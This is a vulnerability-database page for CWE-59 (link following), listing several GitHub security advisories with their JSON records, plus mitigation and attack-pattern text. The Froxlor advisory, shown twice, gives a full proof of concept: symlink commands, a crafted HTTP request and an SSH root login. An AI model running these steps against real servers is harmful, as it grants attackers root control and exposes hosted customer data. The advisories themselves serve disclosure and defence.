Common Weakness Enumeration

CWE-59

Allowed

Improper Link Resolution Before File Access ('Link Following')

Abstraction: Base · Status: Draft

The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

1988 vulnerabilities reference this CWE, most recent first.

GHSA-MQ5V-PXPM-8JW2

Vulnerability from github – Published: 2026-05-29 15:40 – Updated: 2026-06-09 11:54
VLAI
Summary
Froxlor has privilege escalation in SSH key synchronization via symlinked `authorized_keys` path
Details

Summary

Froxlor 2.3.6 contains a symlink-following flaw in the root-owned SSH key synchronization path used for customer FTP users. The provisioning code appends public keys to ~/.ssh/authorized_keys under a customer-controlled home directory without verifying that the target path is not a symbolic link.

If an attacker controls a shell-enabled customer account and can modify files inside the assigned home directory, the attacker can replace ~/.ssh/authorized_keys with a symlink to /root/.ssh/authorized_keys. When Froxlor's privileged cron task later synchronizes SSH keys, it appends the attacker-supplied key into root's authorized key file, resulting in root SSH access.

Details

The customer-facing SSH key workflow accepts an FTP user selection and an arbitrary public key from the authenticated session and forwards them into SshKeys::add():

// customer_ftp.php:251-253
if ($action == 'add' && Request::post('send') == 'send') {
    $result = $log->logAction(USR_ACTION, LOG_INFO, "added SSH-key");
    Commands::get()->apiCall('SshKeys.add', Request::postAll());
}

On the server side, the add handler stores the public key and schedules an NSS rebuild as long as the customer has shell capability enabled at the customer level:

// lib/Froxlor/Api/Commands/SshKeys.php:67-70,120-145
if ($this->getUserDetail('shell_allowed') != '1') {
    throw new Exception("You cannot add SSH keys because shell access is disabled for your account.");
}

$ins_stmt = Database::prepare("
    INSERT INTO `" . TABLE_PANEL_CUSTOMERS_SSH ."`.
");
Settings::AddTask('rebuildnssusers');

Later, a root-owned cron path enters SshKeys::generateFiles() and derives the target path by simple string concatenation:

// lib/Froxlor/Cron/System/SshKeys.php:52-64
$sshdir = FileDir::makeCorrectDir($userinfo['homedir'] . '/.ssh');
$authkeysfile = FileDir::makeCorrectFile($sshdir . '/authorized_keys');
if (!file_exists($authkeysfile)) {
    touch($authkeysfile);
}

The helper used here only normalizes the path string and does not resolve or reject symlinks:

// lib/Froxlor/FileDir.php:376-392
public static function makeCorrectFile(string $file): string
{
    $file = str_replace('//', '/', $file);
    $file = str_replace('\\', '', $file);
    return $file;
}

The root-owned sync code then appends attacker-controlled SSH key material to the derived path:

// lib/Froxlor/Cron/System/SshKeys.php:94-103
file_put_contents($authkeysfile, $userinfo['ssh-rsa'] . "\n", FILE_APPEND | LOCK_EX);
chown($authkeysfile, $userinfo['uid']);
chgrp($authkeysfile, $userinfo['gid']);

Because Froxlor also grants the customer ownership of the home directory tree during account provisioning, the attacker can place a symbolic link at ~/.ssh/authorized_keys before the privileged synchronization step runs.

PoC

An attacker needs an authenticated customer account with shell-enabled home-directory control. That prerequisite may exist by normal configuration, or it may be obtained first through the separate FTP shell-assignment authorization bypass described in the companion report.

Relevant runtime prerequisites:

  • the attacker controls a customer-owned home directory on the target host
  • the attacking customer has shell_allowed=1
  • the attacker can submit SSH keys through the Froxlor panel
  • Froxlor's master cron runs with the intended root privileges

Complete PoC flow:

  1. Obtain shell access as the customer-owned account and prepare a symlink in the home directory:
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys
ln -s /root/.ssh/authorized_keys ~/.ssh/authorized_keys
  1. From an authenticated Froxlor customer session, submit a new SSH public key for the relevant FTP user:
POST /customer_ftp.php?page=sshkeys&action=add HTTP/1.1
Host: target.example
Content-Type: application/x-www-form-urlencoded
Cookie: <authenticated customer session>

csrf_token=VALID_CSRF_TOKEN&
send=send&
description=poc&
ftpuser=17&
ssh_pubkey=ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB attacker@host
  1. Wait for Froxlor's master cron to process the queued REBUILD_NSSUSERS task.
  2. Use the corresponding private key to authenticate as root:
ssh -i id_ed25519 root@target.example

Result:

  • the root-owned cron task follows the symlinked authorized_keys path
  • the submitted public key is appended to /root/.ssh/authorized_keys
  • SSH access as root succeeds with the attacker's key pair

Impact

This is a direct customer-to-root privilege escalation on the managed host. A successful attacker can obtain full operating-system control, read or modify all hosted customer data, persist at the highest privilege level, and tamper with every service administered by the server.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "froxlor/froxlor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.6"
            },
            {
              "fixed": "2.3.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.3.6"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41236"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-29T15:40:23Z",
    "nvd_published_at": "2026-06-04T19:16:29Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nFroxlor 2.3.6 contains a symlink-following flaw in the root-owned SSH key synchronization path used for customer FTP users. The provisioning code appends public keys to `~/.ssh/authorized_keys` under a customer-controlled home directory without verifying that the target path is not a symbolic link.\n\nIf an attacker controls a shell-enabled customer account and can modify files inside the assigned home directory, the attacker can replace `~/.ssh/authorized_keys` with a symlink to `/root/.ssh/authorized_keys`. When Froxlor\u0027s privileged cron task later synchronizes SSH keys, it appends the attacker-supplied key into root\u0027s authorized key file, resulting in root SSH access.\n\n### Details\nThe customer-facing SSH key workflow accepts an FTP user selection and an arbitrary public key from the authenticated session and forwards them into `SshKeys::add()`:\n\n```php\n// customer_ftp.php:251-253\nif ($action == \u0027add\u0027 \u0026\u0026 Request::post(\u0027send\u0027) == \u0027send\u0027) {\n    $result = $log-\u003elogAction(USR_ACTION, LOG_INFO, \"added SSH-key\");\n    Commands::get()-\u003eapiCall(\u0027SshKeys.add\u0027, Request::postAll());\n}\n```\n\nOn the server side, the add handler stores the public key and schedules an NSS rebuild as long as the customer has shell capability enabled at the customer level:\n\n```php\n// lib/Froxlor/Api/Commands/SshKeys.php:67-70,120-145\nif ($this-\u003egetUserDetail(\u0027shell_allowed\u0027) != \u00271\u0027) {\n    throw new Exception(\"You cannot add SSH keys because shell access is disabled for your account.\");\n}\n\n$ins_stmt = Database::prepare(\"\n    INSERT INTO `\" . TABLE_PANEL_CUSTOMERS_SSH .\"`.\n\");\nSettings::AddTask(\u0027rebuildnssusers\u0027);\n```\n\nLater, a root-owned cron path enters `SshKeys::generateFiles()` and derives the target path by simple string concatenation:\n\n```php\n// lib/Froxlor/Cron/System/SshKeys.php:52-64\n$sshdir = FileDir::makeCorrectDir($userinfo[\u0027homedir\u0027] . \u0027/.ssh\u0027);\n$authkeysfile = FileDir::makeCorrectFile($sshdir . \u0027/authorized_keys\u0027);\nif (!file_exists($authkeysfile)) {\n    touch($authkeysfile);\n}\n```\n\nThe helper used here only normalizes the path string and does not resolve or reject symlinks:\n\n```php\n// lib/Froxlor/FileDir.php:376-392\npublic static function makeCorrectFile(string $file): string\n{\n    $file = str_replace(\u0027//\u0027, \u0027/\u0027, $file);\n    $file = str_replace(\u0027\\\\\u0027, \u0027\u0027, $file);\n    return $file;\n}\n```\n\nThe root-owned sync code then appends attacker-controlled SSH key material to the derived path:\n\n```php\n// lib/Froxlor/Cron/System/SshKeys.php:94-103\nfile_put_contents($authkeysfile, $userinfo[\u0027ssh-rsa\u0027] . \"\\n\", FILE_APPEND | LOCK_EX);\nchown($authkeysfile, $userinfo[\u0027uid\u0027]);\nchgrp($authkeysfile, $userinfo[\u0027gid\u0027]);\n```\n\nBecause Froxlor also grants the customer ownership of the home directory tree during account provisioning, the attacker can place a symbolic link at `~/.ssh/authorized_keys` before the privileged synchronization step runs.\n\n\n### PoC\nAn attacker needs an authenticated customer account with shell-enabled home-directory control. That prerequisite may exist by normal configuration, or it may be obtained first through the separate FTP shell-assignment authorization bypass described in the companion report.\n\nRelevant runtime prerequisites:\n\n- the attacker controls a customer-owned home directory on the target host\n- the attacking customer has `shell_allowed=1`\n- the attacker can submit SSH keys through the Froxlor panel\n- Froxlor\u0027s master cron runs with the intended root privileges\n\nComplete PoC flow:\n\n1. Obtain shell access as the customer-owned account and prepare a symlink in the home directory:\n\n```bash\nmkdir -p ~/.ssh\nrm -f ~/.ssh/authorized_keys\nln -s /root/.ssh/authorized_keys ~/.ssh/authorized_keys\n```\n\n2. From an authenticated Froxlor customer session, submit a new SSH public key for the relevant FTP user:\n\n```http\nPOST /customer_ftp.php?page=sshkeys\u0026action=add HTTP/1.1\nHost: target.example\nContent-Type: application/x-www-form-urlencoded\nCookie: \u003cauthenticated customer session\u003e\n\ncsrf_token=VALID_CSRF_TOKEN\u0026\nsend=send\u0026\ndescription=poc\u0026\nftpuser=17\u0026\nssh_pubkey=ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB attacker@host\n```\n\n3. Wait for Froxlor\u0027s master cron to process the queued `REBUILD_NSSUSERS` task.\n4. Use the corresponding private key to authenticate as root:\n\n```bash\nssh -i id_ed25519 root@target.example\n```\n\nResult:\n\n- the root-owned cron task follows the symlinked `authorized_keys` path\n- the submitted public key is appended to `/root/.ssh/authorized_keys`\n- SSH access as `root` succeeds with the attacker\u0027s key pair\n\n### Impact\nThis is a direct customer-to-root privilege escalation on the managed host. A successful attacker can obtain full operating-system control, read or modify all hosted customer data, persist at the highest privilege level, and tamper with every service administered by the server.",
  "id": "GHSA-mq5v-pxpm-8jw2",
  "modified": "2026-06-09T11:54:22Z",
  "published": "2026-05-29T15:40:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-mq5v-pxpm-8jw2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41236"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/froxlor/froxlor"
    },
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Froxlor has privilege escalation in SSH key synchronization via symlinked `authorized_keys` path"
}

GHSA-MQ66-VCFC-8246

Vulnerability from github – Published: 2022-02-15 01:13 – Updated: 2024-09-25 19:41
VLAI
Summary
Mercurial Path Traversal/Link Following vulnerability
Details

A flaw was found in Mercurial before 4.9. It was possible to use symlinks and subrepositories to defeat Mercurial's path-checking logic and write files outside a repository.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "mercurial"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-3902"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-01T16:49:25Z",
    "nvd_published_at": "2019-04-22T16:29:00Z",
    "severity": "MODERATE"
  },
  "details": "A flaw was found in Mercurial before 4.9. It was possible to use symlinks and subrepositories to defeat Mercurial\u0027s path-checking logic and write files outside a repository.",
  "id": "GHSA-mq66-vcfc-8246",
  "modified": "2024-09-25T19:41:29Z",
  "published": "2022-02-15T01:13:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3902"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3902"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/mercurial/PYSEC-2019-188.yaml"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2019/04/msg00024.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00032.html"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4086-1"
    },
    {
      "type": "WEB",
      "url": "https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.9_.282019-02-01.29"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mercurial Path Traversal/Link Following vulnerability"
}

GHSA-MQ6P-G6QC-37C9

Vulnerability from github – Published: 2022-05-14 00:54 – Updated: 2022-05-14 00:54
VLAI
Details

ProFTPD before 1.3.5e and 1.3.6 before 1.3.6rc5 controls whether the home directory of a user could contain a symbolic link through the AllowChrootSymlinks configuration option, but checks only the last path component when enforcing AllowChrootSymlinks. Attackers with local access could bypass the AllowChrootSymlinks control by replacing a path component (other than the last one) with a symbolic link. The threat model includes an attacker who is not granted full filesystem access by a hosting provider, but can reconfigure the home directory of an FTP user.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-7418"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-04-04T17:59:00Z",
    "severity": "MODERATE"
  },
  "details": "ProFTPD before 1.3.5e and 1.3.6 before 1.3.6rc5 controls whether the home directory of a user could contain a symbolic link through the AllowChrootSymlinks configuration option, but checks only the last path component when enforcing AllowChrootSymlinks. Attackers with local access could bypass the AllowChrootSymlinks control by replacing a path component (other than the last one) with a symbolic link. The threat model includes an attacker who is not granted full filesystem access by a hosting provider, but can reconfigure the home directory of an FTP user.",
  "id": "GHSA-mq6p-g6qc-37c9",
  "modified": "2022-05-14T00:54:20Z",
  "published": "2022-05-14T00:54:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7418"
    },
    {
      "type": "WEB",
      "url": "https://github.com/proftpd/proftpd/pull/444/commits/349addc3be4fcdad9bd4ec01ad1ccd916c898ed8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/proftpd/proftpd/commit/ecff21e0d0e84f35c299ef91d7fda088e516d4ed"
    },
    {
      "type": "WEB",
      "url": "https://github.com/proftpd/proftpd/commit/f59593e6ff730b832dbe8754916cb5c821db579f"
    },
    {
      "type": "WEB",
      "url": "http://bugs.proftpd.org/show_bug.cgi?id=4295"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00004.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00022.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00009.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/97409"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MQF8-FVGR-VQF4

Vulnerability from github – Published: 2022-05-17 05:02 – Updated: 2022-05-17 05:02
VLAI
Details

The send_data_to_stdout function in prnt/hpijs/hpcupsfax.cpp in HP Linux Imaging and Printing (HPLIP) 3.x before 3.11.10 allows local users to overwrite arbitrary files via a symlink attack on the /tmp/hpcupsfax.out temporary file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2011-2722"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2012-05-25T20:55:00Z",
    "severity": "LOW"
  },
  "details": "The send_data_to_stdout function in prnt/hpijs/hpcupsfax.cpp in HP Linux Imaging and Printing (HPLIP) 3.x before 3.11.10 allows local users to overwrite arbitrary files via a symlink attack on the /tmp/hpcupsfax.out temporary file.",
  "id": "GHSA-mqf8-fvgr-vqf4",
  "modified": "2022-05-17T05:02:42Z",
  "published": "2022-05-17T05:02:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-2722"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2013:0133"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2013:0500"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2011-2722"
    },
    {
      "type": "WEB",
      "url": "https://bugs.launchpad.net/hplip/+bug/809904"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.novell.com/show_bug.cgi?id=704608"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/attachment.cgi?id=515866\u0026action=diff"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=725830"
    },
    {
      "type": "WEB",
      "url": "http://hplipopensource.com/hplip-web/release_notes.html"
    },
    {
      "type": "WEB",
      "url": "http://rhn.redhat.com/errata/RHSA-2013-0133.html"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/48441"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/55083"
    },
    {
      "type": "WEB",
      "url": "http://security.gentoo.org/glsa/glsa-201203-17.xml"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2011/07/26/14"
    },
    {
      "type": "WEB",
      "url": "http://www.ubuntu.com/usn/USN-1981-1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-MQJQ-9784-HVPV

Vulnerability from github – Published: 2022-05-24 17:33 – Updated: 2026-07-05 03:30
VLAI
Details

Ilex International Sign&go Workstation Security Suite 7.1 allows elevation of privileges via a symlink attack on ProgramData\Ilex\S&G\Logs\000-sngWSService1.log.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-23968"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-11-10T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "Ilex International Sign\u0026go Workstation Security Suite 7.1 allows elevation of privileges via a symlink attack on ProgramData\\Ilex\\S\u0026G\\Logs\\000-sngWSService1.log.",
  "id": "GHSA-mqjq-9784-hvpv",
  "modified": "2026-07-05T03:30:38Z",
  "published": "2022-05-24T17:33:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-23968"
    },
    {
      "type": "WEB",
      "url": "https://ricardojba.github.io/CVE-Pending-ILEX-SignGo-EoP"
    },
    {
      "type": "WEB",
      "url": "http://ilex.com"
    },
    {
      "type": "WEB",
      "url": "http://signgo.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MQMQ-2P8R-Q32F

Vulnerability from github – Published: 2025-05-12 12:30 – Updated: 2025-11-18 21:32
VLAI
Details

VMware Tools contains an insecure file handling vulnerability. A malicious actor with non-administrative privileges on a guest VM may tamper the local files to trigger insecure file operations within that VM.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-22247"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-12T11:15:49Z",
    "severity": "MODERATE"
  },
  "details": "VMware Tools contains an insecure file handling vulnerability.\u00a0A malicious actor with non-administrative privileges on a guest VM may tamper the local files to trigger insecure file operations within that VM.",
  "id": "GHSA-mqmq-2p8r-q32f",
  "modified": "2025-11-18T21:32:28Z",
  "published": "2025-05-12T12:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22247"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00017.html"
    },
    {
      "type": "WEB",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25683"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/05/12/2"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/05/13/2"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/09/24/3"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/09/25/3"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/09/25/5"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/09/26/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MR2X-VHGX-59M3

Vulnerability from github – Published: 2025-05-09 18:30 – Updated: 2025-05-09 18:30
VLAI
Details

Link Following Local Privilege Escalation Vulnerability in System Speedup Service in Avira Operations GmbH Avira Prime Version 1.1.96.2 on Windows 10 x64 allows local attackers to escalate privileges and execute arbitrary code in the context of SYSTEM via creating a symbolic link and leveraging a TOCTTOU (time-of-check to time-of-use) attack.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-9524"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-09T16:15:23Z",
    "severity": "HIGH"
  },
  "details": "Link Following Local Privilege Escalation Vulnerability in System Speedup Service in Avira Operations GmbH Avira Prime Version 1.1.96.2 on Windows 10 x64 allows local attackers to escalate privileges and execute arbitrary code in the context of SYSTEM via creating a symbolic link and leveraging a TOCTTOU (time-of-check to time-of-use) attack.",
  "id": "GHSA-mr2x-vhgx-59m3",
  "modified": "2025-05-09T18:30:37Z",
  "published": "2025-05-09T18:30:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9524"
    },
    {
      "type": "WEB",
      "url": "https://www.gendigital.com/us/en/contact-us/security-advisories"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MRCH-XFW5-VQWR

Vulnerability from github – Published: 2026-02-05 21:32 – Updated: 2026-02-05 21:32
VLAI
Details

Tanium addressed a documentation issue in Engage.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-15324"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-05T19:15:53Z",
    "severity": "MODERATE"
  },
  "details": "Tanium addressed a documentation issue in Engage.",
  "id": "GHSA-mrch-xfw5-vqwr",
  "modified": "2026-02-05T21:32:41Z",
  "published": "2026-02-05T21:32:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15324"
    },
    {
      "type": "WEB",
      "url": "https://security.tanium.com/TAN-2025-004"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MVPQ-6RGJ-X5XQ

Vulnerability from github – Published: 2025-11-11 09:30 – Updated: 2025-11-11 09:30
VLAI
Details

The ACAP Application framework could allow privilege escalation through a symlink attack. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-5718"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-11T07:15:35Z",
    "severity": "MODERATE"
  },
  "details": "The ACAP Application framework could allow privilege escalation through a symlink attack. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications,\u00a0and if an attacker convinces the victim to install a malicious ACAP application.",
  "id": "GHSA-mvpq-6rgj-x5xq",
  "modified": "2025-11-11T09:30:30Z",
  "published": "2025-11-11T09:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5718"
    },
    {
      "type": "WEB",
      "url": "https://www.axis.com/dam/public/3c/a4/6a/cve-2025-5718pdf-en-US-504214.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MW4J-8WF7-4RFP

Vulnerability from github – Published: 2022-04-30 18:11 – Updated: 2024-01-26 18:30
VLAI
Details

FreeBSD allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-1999-0783"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "1998-06-16T04:00:00Z",
    "severity": "MODERATE"
  },
  "details": "FreeBSD allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system.",
  "id": "GHSA-mw4j-8wf7-4rfp",
  "modified": "2024-01-26T18:30:27Z",
  "published": "2022-04-30T18:11:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-1999-0783"
    },
    {
      "type": "WEB",
      "url": "http://www.ciac.org/ciac/bulletins/i-057.shtml"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/6090"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-48.1
Architecture and Design

Strategy: Separation of Privilege

  • Follow the principle of least privilege when assigning access rights to entities in a software system.
  • Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-132: Symlink Attack

An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.

CAPEC-17: Using Malicious Files

An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.